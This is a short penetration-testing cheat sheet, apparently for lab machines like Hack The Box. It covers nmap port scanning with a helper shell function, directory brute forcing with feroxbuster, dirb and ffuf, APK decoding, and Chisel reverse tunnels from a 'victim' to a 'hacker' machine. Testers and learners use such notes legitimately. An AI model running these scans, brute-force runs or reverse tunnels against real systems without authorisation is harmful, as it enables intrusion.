Tools & Cheat Sheet

Nmap

# Fast full-port sweep, saved in grepable format so the open ports can be pulled out below
nmap -p- -T5 --min-rate=1000 10.10.10.239 -oG fkclai.nmap
# Re-scan only the open ports with default scripts and version detection (-oN is the normal-output flag)
nmap -p $(grep -Eo '[0-9]{1,5}/open' fkclai.nmap | cut -d '/' -f 1 | paste -s -d ',' -) -sC -sV 10.10.10.239 -oN nmap-result.txt
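Added example, not from the original cheat sheet: a small POSIX shell function that does the port extraction from the second command above in one place, keeping only TCP ports in the `open` state, de-duplicating across host lines, and refusing to hand an empty list to the follow-up scan. The sample grepable file is constructed here to show the format.

```shell
#!/bin/sh
# Extract open TCP ports from an nmap -oG (grepable) file as "22,80,..."
# ready for "nmap -p". Ignores closed/filtered ports and returns 1 when
# nothing is open, so the caller never runs "nmap -p ''" by accident.
open_ports_from_grepable() {
    # $1 = path to the -oG output file
    ports=$(grep -Eo '[0-9]{1,5}/open/tcp' "$1" \
        | cut -d '/' -f 1 \
        | sort -n -u \
        | paste -s -d ',' -)
    if [ -z "$ports" ]; then
        echo "no open TCP ports found in $1" >&2
        return 1
    fi
    printf '%s\n' "$ports"
}

# Constructed sample of what nmap -oG writes (one host, mixed port states).
SAMPLE_GREPABLE=$(mktemp)
trap 'rm -f "$SAMPLE_GREPABLE"' EXIT
cat > "$SAMPLE_GREPABLE" <<'EOF'
# Nmap 7.94 scan initiated as: nmap -p- -oG fkclai.nmap 10.10.10.239
Host: 10.10.10.239 () Status: Up
Host: 10.10.10.239 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/closed/tcp//https///, 8080/filtered/tcp//http-proxy/// Ignored State: closed (65531)
# Nmap done
EOF

open_ports_from_grepable "$SAMPLE_GREPABLE"   # prints 22,80
```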

Directory Brute Force

feroxbuster -u http://pikatwoo.pokatmon.htb -x php
dirb http://10.10.10.239/ /usr/share/wordlists/dirb/common.txt -o dirb-239.result
ffuf -u http://10.10.11.199:8080/v1/AUTH_andrew/FUZZ -w /opt/SecLists/Discovery/Web-Content/raft-medium-words.txt -mc all -ac

APK Analysis

# Static APK analysis: decode the package (resources, manifest, smali)
apktool d mobile-app.apk
# Check the decoded AndroidManifest.xml
# Configure

HTTP Tunnel

Chisel

Source: https://github.com/jpillora/chisel.git
1. Reverse Tunneling

# Hacker Machine
# start a chisel server on port 12345 that accepts reverse tunnels
./chisel server -p 12345 --reverse
# Victim Machine
# open port 1337 on the hacker machine and forward it to [dump host ip]:8000
./chisel client [hacker IP]:12345 R:1337:[dump host ip]:8000
# Hacker Machine
# http://localhost:1337/ now reaches http://[dump host ip]:8000

2. TCP basic tunneling

# Chisel server on 1.1.1.1
./chisel server -p 1234
# Chisel client on 2.2.2.2: local port 1337 is forwarded through the server to www.exploit-db.com:443
./chisel client 1.1.1.1:1234 1337:www.exploit-db.com:443
# fetch through the local end of the tunnel (TLS is end-to-end, so the certificate is for www.exploit-db.com, not localhost)
wget https://localhost:1337/raw/45782